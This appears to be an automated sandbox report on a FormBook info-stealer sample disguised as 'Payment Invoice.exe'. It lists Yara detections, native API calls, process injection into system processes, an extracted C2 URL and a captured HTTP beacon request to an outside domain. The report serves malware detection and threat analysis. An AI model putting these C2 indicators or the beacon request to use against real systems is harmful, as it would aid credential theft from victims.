Source: Yara match	File source: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 14.2.Payment Invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Payment Invoice.exe.3ad1990.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.Payment Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE

Machine Learning detection for dropped file

Show sources

Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Show sources

Source: Payment Invoice.exe

Joe Sandbox ML: detected

Source: 14.2.Payment Invoice.exe.400000.0.unpack

Avira: Label: TR/Crypt.ZPACK.Gen

Source: Payment Invoice.exe

Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED

Source: Payment Invoice.exe

Static PE information: NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT

Source:	Binary string: WWAHost.pdb source: Payment Invoice.exe, 0000000E.00000002.783465280.0000000003370000.00000040.00000001.sdmp
Source:	Binary string: wscui.pdbUGP source: explorer.exe, 0000000F.00000000.750469066.0000000005A00000.00000002.00000001.sdmp
Source:	Binary string: WWAHost.pdbUGP source: Payment Invoice.exe, 0000000E.00000002.783465280.0000000003370000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdbUGP source: Payment Invoice.exe, 0000000E.00000002.782780518.00000000017BF000.00000040.00000001.sdmp, WWAHost.exe, 00000015.00000002.910484739.00000000036C0000.00000040.00000001.sdmp
Source:	Binary string: wntdll.pdb source: Payment Invoice.exe, WWAHost.exe
Source:	Binary string: C:\Development\Releases\Json\Working\Newtonsoft.Json\Working-Signed\Src\Newtonsoft.Json\obj\Release\Net40\Newtonsoft.Json.pdb source: Payment Invoice.exe, 00000001.00000002.720984105.00000000039B9000.00000004.00000001.sdmp
Source:	Binary string: wscui.pdb source: explorer.exe, 0000000F.00000000.750469066.0000000005A00000.00000002.00000001.sdmp

Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 4x nop then pop esi		14_2_00417300
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 4x nop then pop esi		21_2_02E47300

Networking:

C2 URLs / IPs found in malware configuration

Show sources

Source: Malware configuration extractor

URLs: www.the-techs.info/chue/

Source: global traffic

HTTP traffic detected: GET /chue/?Bxl4iL=G9TtVN5R6EJkOjOehstyspBsMB8h6uPP4SNtk4flZ+Q+zaxTbo8GQGYSWt4KCoCWgLKd&xPZTBf=dn-paHGxXlDP HTTP/1.1Host: www.minterfortexas.comConnection: closeData Raw: 00 00 00 00 00 00 00 Data Ascii:

Source: Joe Sandbox View

IP Address: 198.185.159.144 198.185.159.144

Source: global traffic

Source: unknown

DNS traffic detected: queries for: www.the-techs.info

Source: powershell.exe, 0000000B.00000003.788406161.0000000008D63000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microsoft
Source: powershell.exe, 0000000B.00000003.788406161.0000000008D63000.00000004.00000001.sdmp	String found in binary or memory: http://crl.microsoft.co4
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://fontfabrik.com
Source: Payment Invoice.exe, 00000001.00000002.720984105.00000000039B9000.00000004.00000001.sdmp	String found in binary or memory: http://james.newtonking.com/projects/json
Source: Payment Invoice.exe, 00000001.00000002.720684926.0000000002A45000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: explorer.exe, 0000000F.00000002.911585809.0000000002B50000.00000002.00000001.sdmp	String found in binary or memory: http://www.%s.comPA
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.fonts.com
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: Payment Invoice.exe, 00000001.00000002.720984105.00000000039B9000.00000004.00000001.sdmp	String found in binary or memory: http://www.newtonsoft.com/jsonschema
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sakkal.com
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.tiro.com
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.typography.netD
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: Payment Invoice.exe, 00000001.00000002.729626610.0000000006A32000.00000004.00000001.sdmp, explorer.exe, 0000000F.00000000.760537291.000000000B970000.00000002.00000001.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: powershell.exe, 0000000B.00000003.790519826.0000000005AE1000.00000004.00000001.sdmp	String found in binary or memory: https://go.micro

Source: Payment Invoice.exe, 00000001.00000002.719312419.0000000000D1A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

E-Banking Fraud:

Yara detected FormBook

Show sources

Source: Yara match	File source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match	File source: 14.2.Payment Invoice.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 1.2.Payment Invoice.exe.3ad1990.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 14.2.Payment Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE

System Summary:

Malicious sample detected (through community Yara rule)

Show sources

Source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.908858875.0000000000380000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.721973230.0000000003C24000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.781657076.0000000000400000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000015.00000002.910248106.0000000002E30000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.782477108.0000000001660000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 0000000E.00000002.782306537.0000000001230000.00000040.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000001.00000002.721408933.0000000003AD1000.00000004.00000001.sdmp, type: MEMORY	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.2.Payment Invoice.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.2.Payment Invoice.exe.400000.0.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 1.2.Payment Invoice.exe.3ad1990.6.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 1.2.Payment Invoice.exe.3ad1990.6.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
Source: 14.2.Payment Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 14.2.Payment Invoice.exe.400000.0.raw.unpack, type: UNPACKEDPE	Matched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group

Initial sample is a PE file and has a suspicious name

Show sources

Source: initial sample

Static PE information: Filename: Payment Invoice.exe

Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0041A060 NtClose,	14_2_0041A060
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0041A110 NtAllocateVirtualMemory,	14_2_0041A110
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_00419F30 NtCreateFile,	14_2_00419F30
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_00419FE0 NtReadFile,	14_2_00419FE0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0041A10A NtAllocateVirtualMemory,	14_2_0041A10A
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709910 NtAdjustPrivilegesToken,LdrInitializeThunk,	14_2_01709910
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017099A0 NtCreateSection,LdrInitializeThunk,	14_2_017099A0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709860 NtQuerySystemInformation,LdrInitializeThunk,	14_2_01709860
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709840 NtDelayExecution,LdrInitializeThunk,	14_2_01709840
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017098F0 NtReadVirtualMemory,LdrInitializeThunk,	14_2_017098F0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709A50 NtCreateFile,LdrInitializeThunk,	14_2_01709A50
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709A20 NtResumeThread,LdrInitializeThunk,	14_2_01709A20
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709A00 NtProtectVirtualMemory,LdrInitializeThunk,	14_2_01709A00
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709540 NtReadFile,LdrInitializeThunk,	14_2_01709540
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017095D0 NtClose,LdrInitializeThunk,	14_2_017095D0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709710 NtQueryInformationToken,LdrInitializeThunk,	14_2_01709710
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017097A0 NtUnmapViewOfSection,LdrInitializeThunk,	14_2_017097A0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709780 NtMapViewOfSection,LdrInitializeThunk,	14_2_01709780
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709660 NtAllocateVirtualMemory,LdrInitializeThunk,	14_2_01709660
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017096E0 NtFreeVirtualMemory,LdrInitializeThunk,	14_2_017096E0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709950 NtQueueApcThread,	14_2_01709950
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017099D0 NtCreateProcessEx,	14_2_017099D0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0170B040 NtSuspendThread,	14_2_0170B040
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709820 NtEnumerateKey,	14_2_01709820
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017098A0 NtWriteVirtualMemory,	14_2_017098A0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709B00 NtSetValueKey,	14_2_01709B00
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0170A3B0 NtGetContextThread,	14_2_0170A3B0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709A10 NtQuerySection,	14_2_01709A10
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709A80 NtOpenDirectoryObject,	14_2_01709A80
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709560 NtWriteFile,	14_2_01709560
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0170AD30 NtSetContextThread,	14_2_0170AD30
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709520 NtWaitForSingleObject,	14_2_01709520
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017095F0 NtQueryInformationFile,	14_2_017095F0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0170A770 NtOpenThread,	14_2_0170A770
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709770 NtSetInformationFile,	14_2_01709770
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709760 NtOpenProcess,	14_2_01709760
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709730 NtQueryVirtualMemory,	14_2_01709730
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0170A710 NtOpenProcessToken,	14_2_0170A710
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709FE0 NtCreateMutant,	14_2_01709FE0
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709670 NtQueryInformationProcess,	14_2_01709670
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709650 NtQueryValueKey,	14_2_01709650
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_01709610 NtEnumerateValueKey,	14_2_01709610
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_017096D0 NtCreateKey,	14_2_017096D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729A50 NtCreateFile,LdrInitializeThunk,	21_2_03729A50
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729910 NtAdjustPrivilegesToken,LdrInitializeThunk,	21_2_03729910
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037299A0 NtCreateSection,LdrInitializeThunk,	21_2_037299A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729860 NtQuerySystemInformation,LdrInitializeThunk,	21_2_03729860
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729840 NtDelayExecution,LdrInitializeThunk,	21_2_03729840
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729710 NtQueryInformationToken,LdrInitializeThunk,	21_2_03729710
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729FE0 NtCreateMutant,LdrInitializeThunk,	21_2_03729FE0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729780 NtMapViewOfSection,LdrInitializeThunk,	21_2_03729780
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729660 NtAllocateVirtualMemory,LdrInitializeThunk,	21_2_03729660
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729650 NtQueryValueKey,LdrInitializeThunk,	21_2_03729650
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037296E0 NtFreeVirtualMemory,LdrInitializeThunk,	21_2_037296E0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037296D0 NtCreateKey,LdrInitializeThunk,	21_2_037296D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729540 NtReadFile,LdrInitializeThunk,	21_2_03729540
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037295D0 NtClose,LdrInitializeThunk,	21_2_037295D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729B00 NtSetValueKey,	21_2_03729B00
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0372A3B0 NtGetContextThread,	21_2_0372A3B0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729A20 NtResumeThread,	21_2_03729A20
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729A10 NtQuerySection,	21_2_03729A10
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729A00 NtProtectVirtualMemory,	21_2_03729A00
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729A80 NtOpenDirectoryObject,	21_2_03729A80
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729950 NtQueueApcThread,	21_2_03729950
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037299D0 NtCreateProcessEx,	21_2_037299D0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0372B040 NtSuspendThread,	21_2_0372B040
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729820 NtEnumerateKey,	21_2_03729820
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037298F0 NtReadVirtualMemory,	21_2_037298F0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037298A0 NtWriteVirtualMemory,	21_2_037298A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0372A770 NtOpenThread,	21_2_0372A770
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729770 NtSetInformationFile,	21_2_03729770
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729760 NtOpenProcess,	21_2_03729760
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729730 NtQueryVirtualMemory,	21_2_03729730
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0372A710 NtOpenProcessToken,	21_2_0372A710
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037297A0 NtUnmapViewOfSection,	21_2_037297A0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729670 NtQueryInformationProcess,	21_2_03729670
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729610 NtEnumerateValueKey,	21_2_03729610
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729560 NtWriteFile,	21_2_03729560
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_0372AD30 NtSetContextThread,	21_2_0372AD30
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_03729520 NtWaitForSingleObject,	21_2_03729520
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_037295F0 NtQueryInformationFile,	21_2_037295F0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_02E4A060 NtClose,	21_2_02E4A060
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_02E4A110 NtAllocateVirtualMemory,	21_2_02E4A110
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_02E49FE0 NtReadFile,	21_2_02E49FE0
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_02E49F30 NtCreateFile,	21_2_02E49F30
Source: C:\Windows\SysWOW64\WWAHost.exe	Code function: 21_2_02E4A10A NtAllocateVirtualMemory,	21_2_02E4A10A

Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_00559C5F	1_2_00559C5F
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_0055A067	1_2_0055A067
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_00CE0640	1_2_00CE0640
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_00CE0998	1_2_00CE0998
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_00CE1768	1_2_00CE1768
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_00CE1BF1	1_2_00CE1BF1
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_00CE09B2	1_2_00CE09B2
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_00CE1819	1_2_00CE1819
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_06E12F90	1_2_06E12F90
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_06E17C7D	1_2_06E17C7D
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_06E18B10	1_2_06E18B10
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_06E12098	1_2_06E12098
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_06E18E28	1_2_06E18E28
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_06E17C96	1_2_06E17C96
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_06E1245C	1_2_06E1245C
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_06E132C0	1_2_06E132C0
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_06E18BB7	1_2_06E18BB7
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_06E120D2	1_2_06E120D2
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_06E12088	1_2_06E12088
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_06E14841	1_2_06E14841
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_06E14850	1_2_06E14850
Source: C:\Users\user\Desktop\Payment Invoice.exe	Code function: 1_2_06E13037	1_2_06E13037
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 13_2_001B9C5F	13_2_001B9C5F
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 13_2_001BA067	13_2_001BA067
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_00401030	14_2_00401030
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0041E96E	14_2_0041E96E
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_00401174	14_2_00401174
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0041E1FF	14_2_0041E1FF
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0041D500	14_2_0041D500
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_00402D90	14_2_00402D90
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_00409E2B	14_2_00409E2B
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_00409E30	14_2_00409E30
Source: C:\Users\user\AppData\Local\Temp\Payment Invoice.exe	Code function: 14_2_0041DFCE	14_2_0041DFCE
